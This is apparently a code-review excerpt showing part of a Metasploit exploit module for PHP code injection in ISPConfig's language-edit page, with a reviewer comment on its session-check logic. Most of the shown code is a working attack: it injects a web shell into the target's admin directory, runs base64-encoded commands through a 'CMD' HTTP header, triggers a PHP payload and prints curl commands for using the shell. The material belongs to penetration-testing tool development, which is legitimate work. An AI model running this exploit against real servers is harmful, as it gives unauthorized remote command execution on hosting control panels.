modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,237 @@
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
+    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
+    print_status('Verifying shell injection...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'keep_cookies' => true
+    }, 5)
+    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
+      print_good("Shell successfully injected: #{@shell_file}")
+      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
+      return shell_url
+    else
+      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
+    end
+  end
+
+  def execute_command(command, shell_uri = nil)
+    return nil unless @shell_file
+    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
+    encoded_cmd = Rex::Text.encode_base64(command)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'headers' => {
+        'CMD' => encoded_cmd
+      },
+      'keep_cookies' => true
+    }, 15)
+    return nil unless res
+    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
+    return output_match[1] if output_match
+    nil
+  end
+
+  def trigger_payload(shell_uri)
+    print_status('Triggering PHP payload...')
+    framework.threads.spawn('PayloadTrigger', false) do
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => shell_uri,
+        'keep_cookies' => true
+      }, 10)
+    end
+    framework.threads.spawn('PayloadTriggerManual', false) do
+      select(nil, nil, nil, 2)
+      execute_command('PAYLOAD_TRIGGER', shell_uri)
+    end
+    print_good('PHP payload triggered')
+  end
+
+  def exploit
+    authenticate
+    shell_uri = inject_shell
+    print_status('Starting payload handler...')
+    trigger_payload(shell_uri)
+    print_status('Waiting for session...')
+    select(nil, nil, nil, 5)
+    if framework.sessions.length == 0
+      print_warning('No session established automatically')
+      print_status('Testing shell functionality...')
+      output = execute_command('id', shell_uri)
+      if output
+        print_good("Shell responsive: #{output.strip}")
+        print_line("\n" + '=' * 60)
+        print_status('Shell Access Information:')
+        print_line("URL: #{full_uri}#{shell_uri}")
+        print_line("Usage: Send base64 encoded commands via 'CMD' HTTP header")
+        print_line("Manual trigger: curl '#{full_uri}#{shell_uri}'")
+        print_line("Command example: curl -H 'CMD: #{Rex::Text.encode_base64('id')}' '#{full_uri}#{shell_uri}'")
+        print_line('=' * 60)
+      else
+        print_error('Shell test failed')
+        print_line("Manual test: curl '#{full_uri}#{shell_uri}'")
+      end
+    end
```

Comment:
Not every payload will yield a session so this can be misleading if the user. `php/unix/cmd/adduser` is one such payload for example. The other issue with this code is that `framework.session.length` is a gobal resource, so if *any* module has opened a session it's going to evaluate to true without that session necessarily having come from this module.

I suggest removing this entirely. Once the webshell is replaced with the PHP payload and is cleaned up, the `curl` commands won't be applicable anyways.